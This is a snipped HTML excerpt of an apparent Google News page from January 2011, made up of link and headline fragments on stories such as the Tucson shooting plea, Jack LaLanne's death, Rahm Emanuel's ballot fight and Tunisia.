<span><a target="_blank" class="usg-AFQjCNGamyU16jAdCMJDs5ZkpwKdiXpkGw " href="http://nbcsports.msnbc.com/id/41239129/ns/sports-player_news/" id="MAA4AEgEUAVgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNG2WdPyyjmLcRZK_1AY0NI8Eu5RwA " href="http://www.chicagobreakingsports.com/2011/01/bears-teammates-rally-behind-besieged-cutler.html" id="MAA4AEgEUAZgCGoCdXM"><span class="titletext">
...[SNIP]...
<div class="thumbnail" style=""><a target="_blank" href="http://montreal.ctv.ca/servlet/an/local/CTVNews/20110124/giffords-shooting-case-110124/20110124/?hub=MontrealHome" class="usg-AFQjCNFV1On-T35w6OaTRzPXnDoxdrDZcw " title="CTV.ca"><img alt="" class="" src="http://nt3.ggpht.com/news/tbn/T-Xfzw4FP6yhAM/6.jpg" width="80" height="80"></a> <div class="source "> <a target="_blank" href="http://montreal.ctv.ca/servlet/an/local/CTVNews/20110124/giffords-shooting-case-110124/20110124/?hub=MontrealHome" class="usg-AFQjCNFV1On-T35w6OaTRzPXnDoxdrDZcw "> CTV.ca </a>
...[SNIP]...
<h2 class="title"> <a target="_blank" class="usg-AFQjCNHBvFgzzTzx9w0WGdmzzseti6ngaQ " href="http://www.reuters.com/article/idUSTRE70N6U520110124" id="MAA4AEgFUABgAWoCdXM"><span class="titletext">
...[SNIP]...
<div class="aa-inner"><a href="http://feeds.nytimes.com/click.phdo?i=1134bc987ca2a36b4b35055e16a29639" target="_blank" class="usg-AFQjCNHRBBkahFzpw1JR8NdswhIZNcjYIw " id="MAA4AEgFUAFgAmoCdXM">Suspect Pleads Not Guilty in Tucson Shooting</a>
...[SNIP]...
<div class="aa-inner"><a href="http://abcnews.go.com/US/jared-loughner-accused-tucson-shooter-smiles-court-appearance/story?id=12750000" target="_blank" class="usg-AFQjCNHFSESne1W6NZKJuevUCkqaTiP9mg " id="MAA4AEgFUAJgAmoCdXM">Accused Tucson Gunman Jared Loughner Smiles Through Hearing</a>
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNElebFTmOpQ7wKik8gpIXpP1selVQ " href="http://www.9and10news.com/Category/Story/?id=279641&amp;cID=3" id="MAA4AEgFUANgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNEOK7cyGOy-zN-41xid_LtEjydG4Q " href="http://www.businessweek.com/news/2011-01-24/loughner-pleads-not-guilty-to-attempted-murder-charges.html" id="MAA4AEgFUARgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNFSXfhjHN0rS0rdJf8PBDheYe6-rQ " href="http://mystateline.com/fulltext-news/?nxd_id=223216" id="MAA4AEgFUAVgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNF-e3D8cBL-34zlHFtAKxTJkVxrjQ " href="http://www.ny1.com/content/news_beats/politics/132719/suspect-in-arizona-shooting-pleads-not-guilty/Default.aspx" id="MAA4AEgFUAZgCGoCdXM"><span class="titletext">
...[SNIP]...
<div class="thumbnail" style=""><a target="_blank" href="http://www.ctv.ca/CTVNews/Entertainment/20110124/jack-lalanne-remembered-110124/" class="usg-AFQjCNEqPf2jo0bh-NTnwGk18mUUjIJQSA " title="CTV.ca"><img alt="" class="" src="http://nt0.ggpht.com/news/tbn/eBjIWpZWD7cpIM/6.jpg" width="80" height="80"></a> <div class="source "> <a target="_blank" href="http://www.ctv.ca/CTVNews/Entertainment/20110124/jack-lalanne-remembered-110124/" class="usg-AFQjCNEqPf2jo0bh-NTnwGk18mUUjIJQSA "> CTV.ca </a>
...[SNIP]...
<h2 class="title"> <a target="_blank" class="usg-AFQjCNHGP9SsjzyW62sRmc_IObJzTshL0g " href="http://www.mercurynews.com/breaking-news/ci_17184991" id="MAA4AEgGUABgAWoCdXM"><span class="titletext">
...[SNIP]...
<span class="yt-holder"><img class="youtube-icon icon" src="http://www.gstatic.com/news/img/cleardot.gif" alt="" width="16" height="16"></span>
...[SNIP]...
<noscript><a href="http://www.youtube.com/watch?v=uwXNpYAgahg">Video:&nbsp;
Fitness Guru Jack LaLanne Dead at 96
<img class="youtube-icon icon" src="http://www.gstatic.com/news/img/cleardot.gif" alt="" width="16" height="16"></a>
...[SNIP]...
<div class="aa-inner"><a href="http://www.latimes.com/news/obituaries/la-me-jack-lalanne-20110124,0,6764075.story" target="_blank" class="usg-AFQjCNF2h3Ezfm1HF14DqaqR8JY12OIJCg " id="MAA4AEgGUAFgAmoCdXM">Jack LaLanne dies at 96; spiritual father of US fitness movement</a>
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNG2OtWhDeooSC6nGZ0XSwCL8YlTOA " href="http://www.foxnews.com/entertainment/2011/01/24/biggest-fitness-guru-time/" id="MAA4AEgGUAJgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNHCUvbbz0ZsETsJAmVKDjwuHSZcMQ " href="http://www.usatoday.com/yourlife/fitness/exercise/2011-01-25-lalanneobit24_ST_N.htm?csp=ylf" id="MAA4AEgGUANgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNFY9XEVCdovnm3JUC4ZmzWPDVoZqw " href="http://www.catholic.org/ae/celebrity/story.php?id=40071" id="MAA4AEgGUARgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNH3k-EVRZWMzJLRjpI1Ql1ccGWDqw " href="http://www.washingtonpost.com/wp-dyn/content/article/2011/01/24/AR2011012403521.html" id="MAA4AEgGUAVgCGoCdXM"><span class="titletext">
...[SNIP]...
<div class="thumbnail" style=""><a target="_blank" href="http://www.theglobeandmail.com/news/world/emanuels-name-removed-from-ballot-for-chicago-mayor-lawyer-says/article1880888/" class="usg-AFQjCNF4CD2pAreAYNI5YagcDWGJj7WVog " title="Globe and Mail"><img alt="" class="" src="http://nt2.ggpht.com/news/tbn/gsPtXlmrvQGLtM/6.jpg" width="80" height="80"></a> <div class="source "> <a target="_blank" href="http://www.theglobeandmail.com/news/world/emanuels-name-removed-from-ballot-for-chicago-mayor-lawyer-says/article1880888/" class="usg-AFQjCNF4CD2pAreAYNI5YagcDWGJj7WVog "> Globe and M... </a>
...[SNIP]...
<h2 class="title"> <a target="_blank" class="usg-AFQjCNGJtokXRbLsVUlXcHg5zkA1i0nTdg " href="http://www.suntimes.com/3470538-417/court-emanuel-appellate-chicago-law.html" id="MAA4AEgHUABgAWoCdXM"><span class="titletext">
...[SNIP]...
<span class="yt-holder"><img class="youtube-icon icon" src="http://www.gstatic.com/news/img/cleardot.gif" alt="" width="16" height="16"></span>
...[SNIP]...
<noscript><a href="http://www.youtube.com/watch?v=A1JzTAhSoKA">Video:&nbsp;
Emanuel Has 'No Doubt' He'll Win Ballot Fight
<img class="youtube-icon icon" src="http://www.gstatic.com/news/img/cleardot.gif" alt="" width="16" height="16"></a>
...[SNIP]...
<div class="aa-inner"><a href="http://www.csmonitor.com/USA/2011/0124/Rahm-Emanuel-ruling-big-setback-at-a-crucial-time-in-Chicago-mayor-s-race" target="_blank" class="usg-AFQjCNHviaETBQQ4CbFKFWhs-WtpR5QLaA " id="MAA4AEgHUAFgAmoCdXM">Rahm Emanuel ruling: big setback at a crucial time in Chicago mayor&#39;s race</a>
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNEwKQiOZfU8EiZQoS5g2nyEQ2IkLQ " href="http://www.washingtonpost.com/wp-dyn/content/article/2011/01/24/AR2011012404850.html" id="MAA4AEgHUAJgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNFJBnWLd2TgwaUXTMuZXch-7Gla7g " href="http://latino.foxnews.com/latino/politics/2011/01/24/rahm-emanuel-chicago-mayoral-race-opening-latino-candidates/" id="MAA4AEgHUANgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNE9k9pvvHS3M9uwGtHG3nIJ00qnUQ " href="http://www.idahostatejournal.com/news/national/article_4f292c44-2808-11e0-86d1-001cc4c03286.html" id="MAA4AEgHUAVgCGoCdXM"><span class="titletext">
...[SNIP]...
<div class="thumbnail" style=""><a target="_blank" href="http://www.ctv.ca/CTVNews/TopStories/20110122/tunisia-montreal-110122/" class="usg-AFQjCNGCYpC-tROn3xPDxxA2H_u5qL69NQ " title="CTV.ca"><img alt="" class="" src="http://nt3.ggpht.com/news/tbn/z55aFPv78aqfWM/6.jpg" width="80" height="80"></a> <div class="source "> <a target="_blank" href="http://www.ctv.ca/CTVNews/TopStories/20110122/tunisia-montreal-110122/" class="usg-AFQjCNGCYpC-tROn3xPDxxA2H_u5qL69NQ "> CTV.ca </a>
...[SNIP]...
<h2 class="title"> <a target="_blank" class="usg-AFQjCNGf__nmauUuSabbP9kk2SvRT05zrg " href="http://online.wsj.com/article/SB10001424052748704279704576102300534990160.html?mod=googlenews_wsj" id="MAA4AEgIUABgAWoCdXM"><span class="titletext">
...[SNIP]...
<div class="aa-inner"><a href="http://feeds.nytimes.com/click.phdo?i=7700bb1615b746aacc097462c73508b7" target="_blank" class="usg-AFQjCNHXjZjZZ9wZ1CQDlom-nLlng-eGZQ " id="MAA4AEgIUAFgAmoCdXM">Army Leader Guarantees Stability in Tunisia</a>
...[SNIP]...
<div class="aa-inner"><a href="http://edition.cnn.com/2011/WORLD/americas/01/24/tunisia.canada.ben.ali/" target="_blank" class="usg-AFQjCNHRMMEdervYw4C3TrR4yaH527g-LA " id="MAA4AEgIUAJgAmoCdXM">Family of deposed Tunisian president reportedly flees to Canada</a>
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNGfbz26qP-4kIHs7Cs4zetWEFMGQg " href="http://www.reuters.com/article/idUSTRE70N4AE20110124" id="MAA4AEgIUANgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNFd1p9S1P917IJX6_NsO7fub3yJQg " href="http://allafrica.com/stories/201101242014.html" id="MAA4AEgIUARgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNHBQ6i08N55rvq2OZdEmGRrU9lJbg " href="http://www.csmonitor.com/World/Middle-East/2011/0124/Tunisia-s-opposition-defends-unity-government-as-pressure-mounts" id="MAA4AEgIUAVgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNEIRtGWiZ24XajWlPE7P_ytLx4u3w " href="http://english.aljazeera.net/news/africa/2011/01/2011124163051778391.html" id="MAA4AEgIUAZgCGoCdXM"><span class="titletext">
...[SNIP]...
<div class="thumbnail" style=""><a target="_blank" href="http://www.zeenews.com/news682964.html" class="usg-AFQjCNGjuhLYOwwQDWERwWa00agiriIpeA " title="Zee News"><img alt="" class="" src="http://nt1.ggpht.com/news/tbn/-ZSVDVOrR4x4PM/6.jpg" width="80" height="80"></a> <div class="source "> <a target="_blank" href="http://www.zeenews.com/news682964.html" class="usg-AFQjCNGjuhLYOwwQDWERwWa00agiriIpeA "> Zee News </a>
...[SNIP]...
<h2 class="title"> <a target="_blank" class="usg-AFQjCNGE1VkAeO99EDIU5V2VTdJDt90ETw " href="http://arstechnica.com/web/news/2011/01/mozilla-google-take-different-approaches-to-user-tracking-opt-out.ars" id="MAA4AEgJUABgAWoCdXM"><span class="titletext">
...[SNIP]...
<div class="aa-inner"><a href="http://www.pcmag.com/article2/0,2817,2376185,00.asp" target="_blank" class="usg-AFQjCNGZP7c0Zl6lnVgm4bMy_QmQ4_9spA " id="MAA4AEgJUAJgAmoCdXM">Tracking Should Be Abolished</a>
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNGMvJiGe2AX0noQzS6SakNvosEsRw " href="http://www.technewsworld.com/story/Firefox-Do-Not-Track-Feature-Seen-as-Toothless-71710.html" id="MAA4AEgJUANgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNH2Ail2CEz7JI11eKLrtWgI-nzRPQ " href="http://www.pcworld.com/businesscenter/article/217478/firefox_donottrack_feature_has_a_fatal_flaw.html" id="MAA4AEgJUARgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNHmUD0OklmTxR-5BKg01tb_AruD4A " href="http://www.computerworld.com/s/article/9206061/Google_jumps_into_Do_Not_Track_debate_with_Chrome_add_on?taxonomyId=84" id="MAA4AEgJUAZgCGoCdXM"><span class="titletext">
...[SNIP]...
<div class="thumbnail" style=""><a target="_blank" href="http://www.bizjournals.com/stlouis/news/2011/01/24/creve-coeur-to-lose-smurfit-stone-hq.html" class="usg-AFQjCNFlkgnxLOGOIFyBSsT-ZZz8lmH1PA " title="Bizjournals.com"><img alt="" class="" src="http://nt3.ggpht.com/news/tbn/g54p1BDYwrB4oM/6.jpg" width="80" height="80"></a> <div class="source "> <a target="_blank" href="http://www.bizjournals.com/stlouis/news/2011/01/24/creve-coeur-to-lose-smurfit-stone-hq.html" class="usg-AFQjCNFlkgnxLOGOIFyBSsT-ZZz8lmH1PA "> Bizjournals... </a>
...[SNIP]...
<h2 class="title"> <a target="_blank" class="usg-AFQjCNFJ_Gs52Mso4Rmc8202BGU0W2_L6Q " href="http://www.reuters.com/article/idUSTRE70N6Q420110124" id="MAA4AEgKUABgAWoCdXM"><span class="titletext">
...[SNIP]...
<div class="aa-inner"><a href="http://online.wsj.com/article/SB10001424052748703555804576102341574484526.html?mod=googlenews_wsj" target="_blank" class="usg-AFQjCNHfGkJgRqTwQFW4jGNECzdb_053bw " id="MAA4AEgKUAFgAmoCdXM">Smurfit Options Trades Raise Analyst Brows</a>
...[SNIP]...
<div class="aa-inner"><a href="http://www.thestreet.com/story/10982553/1/tax-preparation-halliburton-hot-trends.html?cm_ven=GOOGLEN" target="_blank" class="usg-AFQjCNEjjwBXv_sJbLEN9ftV5HG1BzLX7g " id="MAA4AEgKUAJgAmoCdXM">McRib, Smurfit-Stone: Hot Trends</a>
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNF7GHQ7EiaH4U94pZ0LQb_hOwaJjA " href="http://www.marketwatch.com/story/rocktenn-to-buy-smurfit-stone-for-35-billion-2011-01-24" id="MAA4AEgKUANgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNF8KU8lwacw5bgjcA_PplD4ky7CcA " href="http://www.missourinet.com/2011/01/24/st-louis-based-smurfit-stone-sells-for-3-5b/" id="MAA4AEgKUARgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNEoA064sb9NXd1pqBHc47dzM2oIJw " href="http://www.thirdage.com/news/rock-tenn-buys-smurfit-stone-35-billion_1-24-2011" id="MAA4AEgKUAVgCGoCdXM"><span class="titletext">
...[SNIP]...
<div class="thumbnail" style=""><a target="_blank" href="http://www.reuters.com/article/idUSTRE70N5ZW20110124" class="usg-AFQjCNH7STnOQPGVSySyMeBzJftacyPLLg " title="Reuters"><img alt="" class="" src="http://nt1.ggpht.com/news/tbn/0fcME5GA0IOcZM/6.jpg" width="80" height="80"></a> <div class="source "> <a target="_blank" href="http://www.reuters.com/article/idUSTRE70N5ZW20110124" class="usg-AFQjCNH7STnOQPGVSySyMeBzJftacyPLLg "> Reuters </a>
...[SNIP]...
<h2 class="title"> <a target="_blank" class="usg-AFQjCNGGya3F-AttIyCGzX9tofIwFV9hxA " href="http://www.guardian.co.uk/world/2011/jan/24/papers-palestinian-leaders-refugees-fight" id="MAA4AEgLUABgAWoCdXM"><span class="titletext">
...[SNIP]...
<span class="yt-holder"><img class="youtube-icon icon" src="http://www.gstatic.com/news/img/cleardot.gif" alt="" width="16" height="16"></span>
...[SNIP]...
<noscript><a href="http://www.youtube.com/watch?v=Id_W6wgEIGo">Video:&nbsp;
Palestine Papers spark fury in Ramallah
<img class="youtube-icon icon" src="http://www.gstatic.com/news/img/cleardot.gif" alt="" width="16" height="16"></a>
...[SNIP]...
<div class="aa-inner"><a href="http://online.wsj.com/article/SB10001424052748704279704576102242255911216.html?mod=googlenews_wsj" target="_blank" class="usg-AFQjCNElKv0GNcBZgzUQCULJE3OQ6oz6jw " id="MAA4AEgLUAFgAmoCdXM">Palestinians Blast Leaked Mideast Peace Offers</a>
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNEaadv9eEgCosx3Fx9YrK8VmjQUUA " href="http://www.jpost.com/MiddleEast/Article.aspx?id=205065" id="MAA4AEgLUAJgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNECRhzSqEJbRN9fKfxZ08aW9SDk8A " href="http://www.bbc.co.uk/go/rss/int/news/-/news/world-middle-east-12270504" id="MAA4AEgLUANgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNHoZJ4kqbRh3uXH99xaN2e36i18eg " href="http://english.aljazeera.net/palestinepapers/2011/01/201112412224387862.html" id="MAA4AEgLUARgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNFcbaKFXcbVlD-hDAIqRt4Ui9VNrg " href="http://www.voanews.com/english/news/middle-east/Palestinian-Leaders-Dispute-Leaked-Documents---114484609.html" id="MAA4AEgLUAVgCGoCdXM"><span class="titletext">
...[SNIP]...
<div class="thumbnail" style=""><a target="_blank" href="http://www.moneycontrol.com/news/international-results/dow-sp-edge-lower-f5-earnings-hurt-nasdaq_515106.html" class="usg-AFQjCNH3iX1ZBGvSzzZesTRG42m5brg5Cw " title="Moneycontrol.com"><img alt="" class="" src="http://nt2.ggpht.com/news/tbn/UkW8kFz-O4CJKM/6.jpg" width="80" height="80"></a> <div class="source "> <a target="_blank" href="http://www.moneycontrol.com/news/international-results/dow-sp-edge-lower-f5-earnings-hurt-nasdaq_515106.html" class="usg-AFQjCNH3iX1ZBGvSzzZesTRG42m5brg5Cw "> Moneycontro... </a>
...[SNIP]...
<h2 class="title"> <a target="_blank" class="usg-AFQjCNH7-rWlccEq7cwEKGNCX6a9uJMRNQ " href="http://online.wsj.com/article/BT-CO-20110124-714008.html" id="MAA4AEgMUABgAWoCdXM"><span class="titletext">
...[SNIP]...
<div class="aa-inner"><a href="http://www.reuters.com/article/idUSN2420802420110124" target="_blank" class="usg-AFQjCNGoGQVkZN2q9DGMTfSiaeUQq4RieQ " id="MAA4AEgMUAFgAmoCdXM">US STOCKS-Wall St rises on renewed earnings optimism</a>
...[SNIP]...
<div class="aa-inner"><a href="http://www.marketwatch.com/story/us-stocks-cheer-intel-buyback-ma-2011-01-24?reflink=MW_news_stmp" target="_blank" class="usg-AFQjCNGIeomnqVSxdru4h94biZmHu5ir1Q " id="MAA4AEgMUAJgAmoCdXM">U.S. stocks cheer Intel buyback, M&amp;A</a>
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNEYcn6V7dlmKxgqNQuPFpnia4b7nA " href="http://www.dailyfinance.com/story/investing/dow-rallies-on-tech-stocks-next-stop-12-000/19813156/" id="MAA4AEgMUANgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNG0Til1etlK6LHkupuK74ArvlipkQ " href="http://www.businessweek.com/ap/financialnews/D9KUNG1O2.htm" id="MAA4AEgMUARgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNG3LWFcRVznuDaTqyxh6O7A466PnA " href="http://www.monstersandcritics.com/news/business/news/article_1614222.php/US-stocks-start-week-with-gains" id="MAA4AEgMUAVgCGoCdXM"><span class="titletext">
...[SNIP]...
<div class="thumbnail" style=""><a target="_blank" href="http://www.ctv.ca/CTVNews/World/20110124/ivory-coast-110124/" class="usg-AFQjCNGJnAXHtEGipcPqMRnlYCUI4huEBA " title="CTV.ca"><img alt="" class="" src="http://nt0.ggpht.com/news/tbn/XOGGS4W8bp8xCM/6.jpg" width="80" height="80"></a> <div class="source "> <a target="_blank" href="http://www.ctv.ca/CTVNews/World/20110124/ivory-coast-110124/" class="usg-AFQjCNGJnAXHtEGipcPqMRnlYCUI4huEBA "> CTV.ca </a>
...[SNIP]...
<h2 class="title"> <a target="_blank" class="usg-AFQjCNG3JzDql7WAkcCHRYSnsAbbGadxAg " href="http://www.voanews.com/english/news/africa/Nigeria-Wants-UN-Backing-for-Military-Intervention-in-Ivory-Coast-114510399.html" id="MAA4AEgNUABgAWoCdXM"><span class="titletext">
...[SNIP]...
<div class="aa-inner"><a href="http://www.bloomberg.com/news/2011-01-24/summary-box-ivory-coast-might-ban-cocoa-exports.html" target="_blank" class="usg-AFQjCNFvQyMenWhWCi8Scnr2HQOzz1Myqw " id="MAA4AEgNUAFgAmoCdXM">Summary Box: Ivory Coast might ban cocoa exports</a>
...[SNIP]...
<div class="aa-inner"><a href="http://www.washingtonpost.com/wp-dyn/content/article/2011/01/24/AR2011012404718.html" target="_blank" class="usg-AFQjCNH8xyRSjagQTe7qcKbQ1RxMrRntiw " id="MAA4AEgNUAJgAmoCdXM">US backs ban on Ivory Coast cocoa imports</a>
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNE8w5-3wv-Joef82tAEi3WkRMlKBg " href="http://abcnews.go.com/Business/wireStory?id=12751095" id="MAA4AEgNUANgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNGEkYfaKL41vivSMDYuj5cNE_tgpw " href="http://www.dailytimes.com.pk/default.asp?page=2011%5C01%5C25%5Cstory_25-1-2011_pg4_3" id="MAA4AEgNUARgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNHt7HNh28TuTa201PSzxavp-qCB9w " href="http://www.reuters.com/article/idUSTRE70N66I20110124" id="MAA4AEgNUAZgCGoCdXM"><span class="titletext">
...[SNIP]...
<div class="thumbnail" style=""><a target="_blank" href="http://www.foxnews.com/health/2011/01/24/report-heart-disease-costs-triple/" class="usg-AFQjCNEABo5vi1V46W0WvRcqWvag9t1vuw " title="Fox News"><img alt="" class="" src="http://nt3.ggpht.com/news/tbn/mwTGtKZ4NInPwM/6.jpg" width="80" height="80"></a> <div class="source "> <a target="_blank" href="http://www.foxnews.com/health/2011/01/24/report-heart-disease-costs-triple/" class="usg-AFQjCNEABo5vi1V46W0WvRcqWvag9t1vuw "> Fox News </a>
...[SNIP]...
<h2 class="title"> <a target="_blank" class="usg-AFQjCNFDfn7oAgiO1bwSefFQwDxUfjYx7w " href="http://www.webmd.com/heart-disease/news/20110123/heart-disease-treatment-costs-may-triple-in-next-20-years" id="MAA4AEgOUABgAWoCdXM"><span class="titletext">
...[SNIP]...
<div class="aa-inner"><a href="http://health.usnews.com/health-news/family-health/heart/articles/2011/01/24/lowering-bp-can-help-cut-womens-heart-disease-risk.html" target="_blank" class="usg-AFQjCNGMewBDUXKRrXbz9dDPgk2CfatYqg " id="MAA4AEgOUAFgAmoCdXM">Lowering BP Can Help Cut Women&#39;s Heart Disease Risk</a>
...[SNIP]...
<div class="aa-inner"><a href="http://www.businessweek.com/lifestyle/content/healthday/649165.html" target="_blank" class="usg-AFQjCNFTF19UjawTG0U74K1vgENiWJteKg " id="MAA4AEgOUAJgAmoCdXM">U.S. Heart Disease Costs Expected to Soar</a>
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNG3XToTSrtKhlkI7xZ-Y6ypAF1H4g " href="http://www.msnbc.msn.com/id/41234780/ns/health-heart_health/" id="MAA4AEgOUANgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNEShwCjRPP3o8B9Bknfl-uNzkHnTg " href="http://www.bloomberg.com/news/2011-01-24/heart-disease-treatment-cost-to-triple-to-818-billion-by-2030-group-says.html" id="MAA4AEgOUARgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNGcfD1knVticOCLd49-9hkVxr9FiA " href="http://ozarksfirst.com/fulltext?nxd_id=391716" id="MAA4AEgOUAVgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNHbJTmNGEga0s_5dekJF3wI_kJcFw " href="http://www.prnewswire.com/news-releases/american-heart-association-rapid-access-journal-report-lowering-blood-pressure-in-middle-aged-women-reduces-heart-disease-risk-114504829.html" id="MAA4AEgOUAZgCGoCdXM"><span class="titletext">
...[SNIP]...
<div class="thumbnail" style=""><a target="_blank" href="http://www.theglobeandmail.com/sports/football/tom-brady-a-unanimous-ap-all-pro/article1881082/" class="usg-AFQjCNEysYm69ZDXP4EpTrC80dSrklUIwA " title="Globe and Mail"><img alt="" class="" src="http://nt1.ggpht.com/news/tbn/8VFR3JrwXIVmeM/6.jpg" width="80" height="80"></a> <div class="source "> <a target="_blank" href="http://www.theglobeandmail.com/sports/football/tom-brady-a-unanimous-ap-all-pro/article1881082/" class="usg-AFQjCNEysYm69ZDXP4EpTrC80dSrklUIwA "> Globe and M... </a>
...[SNIP]...
<h2 class="title"> <a target="_blank" class="usg-AFQjCNEceaM8GMTGP7YZHD2H7DN0PklU7g " href="http://www.bostonherald.com/sports/football/patriots/view.bg?articleid=1311662&amp;srvc=rss" id="MAA4AEgPUABgAWoCdXM"><span class="titletext">
...[SNIP]...
<div class="aa-inner"><a href="http://espn.go.com/blog/boston/new-england-patriots/post?id=4692316" target="_blank" class="usg-AFQjCNFXDwzIsfpbYW4xLUwi4UyNPddplA " id="MAA4AEgPUAFgAmoCdXM">Brady unanimous choice as AP All-Pro</a>
...[SNIP]...
<div class="aa-inner"><a href="http://musketfire.com/2011/01/24/three-patriots-make-the-all-pro-team/" target="_blank" class="usg-AFQjCNGS3y2ZauZ7IEGNf6kOGpRFYvxByw " id="MAA4AEgPUAJgAmoCdXM">Three Patriots Make the All-Pro Team</a>
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNFtVmCzgJetNQA3YuO6D6T2xCsrGQ " href="http://www.boston.com/sports/football/patriots/extra_points/2011/01/tom_brady_unani.html" id="MAA4AEgPUANgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNGDZvJMjOxvPGWf0GTtpiYowmX3nw " href="http://itiswhatitis.weei.com/sports/newengland/football/patriots/2011/01/24/brady-mayo-mankins-named-all-pro/" id="MAA4AEgPUARgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNHvwv1Cu4OL92x3XwJPQZYjdPrTWQ " href="http://www.rotoworld.com/content/playerpages/playerbreakingnews.asp?sport=NFL&amp;id=1163&amp;line=199317&amp;spln=1" id="MAA4AEgPUAVgCGoCdXM"><span class="titletext">
...[SNIP]...
<div class="thumbnail" style=""><a target="_blank" href="http://www.reuters.com/article/idUSTRE70N5P220110124" class="usg-AFQjCNHe6Eb7ocpi6F9HMD_xPO3C4NQ3CQ " title="Reuters"><img alt="" class="" src="http://nt3.ggpht.com/news/tbn/M2eWhkFHXWq5TM/6.jpg" width="80" height="80"></a> <div class="source "> <a target="_blank" href="http://www.reuters.com/article/idUSTRE70N5P220110124" class="usg-AFQjCNHe6Eb7ocpi6F9HMD_xPO3C4NQ3CQ "> Reuters </a>
...[SNIP]...
<div class="aa-inner"><a href="http://www.pcmag.com/article2/0,2817,2376180,00.asp" target="_blank" class="usg-AFQjCNEeedKNUlqWQgoNsXULz0osRTWeaQ " id="MAA4AEgQUAFgAmoCdXM">Twitter&#39;s Ad Revenue Predicted to Pass MySpace</a>
...[SNIP]...
<div class="aa-inner"><a href="http://www.emarketer.com/Article.aspx?R=1008192" target="_blank" class="usg-AFQjCNFHIkw8yyxLm5eiE9NU2pbWrOnIXQ " id="MAA4AEgQUAJgAmoCdXM">Twitter Ad Revenues to Soar This Year</a>
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNHe6Eb7ocpi6F9HMD_xPO3C4NQ3CQ " href="http://www.reuters.com/article/idUSTRE70N5P220110124" id="MAA4AEgQUANgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNFZO8otCjpSj5AP5vwSF4Llgt--JA " href="http://www.bloomberg.com/news/2011-01-24/twitter-s-advertising-revenue-may-triple-to-150-million-emarketer-says.html" id="MAA4AEgQUARgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNHEmKzfFERxkTqgK7-nDAlnLBvvlg " href="http://www.digitaltrends.com/computing/twitter-advertising-revenue-swiftly-challenging-myspace/" id="MAA4AEgQUAVgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNGVukQYF2CS02hBDpoVNsgSl2Vhrg " href="http://business.newsfactor.com/story.xhtml?story_id=12000005I4S0" id="MAA4AEgQUAZgCGoCdXM"><span class="titletext">
...[SNIP]...
<div class="thumbnail" style=""><a target="_blank" href="http://www.reuters.com/article/idUSTRE70N6VU20110124" class="usg-AFQjCNGwTpqGo6WmM4BNaUuWfZ8_PglAEw " title="Reuters"><img alt="" class="" src="http://nt3.ggpht.com/news/tbn/N_5JZv88v78-mM/6.jpg" width="80" height="80"></a> <div class="source "> <a target="_blank" href="http://www.reuters.com/article/idUSTRE70N6VU20110124" class="usg-AFQjCNGwTpqGo6WmM4BNaUuWfZ8_PglAEw "> Reuters </a>
...[SNIP]...
<h2 class="title"> <a target="_blank" class="usg-AFQjCNFGDQxlf2HkP_kY_tNzY5iMi_-1RQ " href="http://content.usatoday.com/communities/thehuddle/post/2011/01/donald-driver-super-bowl-vs-steelers-is-packers-to-lose/1" id="MAA4AEgRUABgAWoCdXM"><span class="titletext">
...[SNIP]...
<span class="yt-holder"><img class="youtube-icon icon" src="http://www.gstatic.com/news/img/cleardot.gif" alt="" width="16" height="16"></span>
...[SNIP]...
